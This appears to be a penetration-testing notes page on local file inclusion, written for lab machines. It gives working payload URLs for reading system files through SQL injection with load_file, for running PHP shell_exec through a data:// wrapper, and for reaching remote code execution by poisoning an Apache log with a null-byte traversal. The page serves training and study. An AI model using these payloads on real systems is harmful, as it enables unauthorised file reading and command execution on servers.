LFI
Last updated
Was this helpful?
Last updated
Was this helpful?
If you have SQLi or can modify templates, see if you can read a system file. If this works you can try for rce. (in this case its windows with apache):
http://192.168.11.35/comment.php?id=-1 union select all 1,2,3,4,load_file('c:/windows/system32/drivers/etc/host'),6
http://10.11.0.22/menu.php?file=data:text/plain,hello world
The menu page is vulnerable to LFI attacks. If we submit a payload using a data wrapper, the application should treat it the text the same as a regular file and include it in the page. http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
Found this code on the site:
include: Used to load files, (php files in this case) from the server locally and run them. In this case we can submit something other than en,fr,etc and have the server request other files. We test a common windows file to make sure our traversal works.
A null byte %00 is used to stop the code from trying to append the php extension via the include statement.
One way to get RCE with LFI is by poisoning a log file with php then displaying the file in the browser so the php is executed. We can do this by making a bad request with nc that contains our code and then read back the log with apache php.
This causes our request to get logged at : c:\xampp\apache\logs\access.log
Match your log file type/path to the server you are attacking.
http://10.11.1.35/addguestbook.php?cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00
Commands will be executed with the apache privs. From here a more persistent shell/backdoor can be established.
Often encodings are combined with this method. Below are a couple sources to get you started.
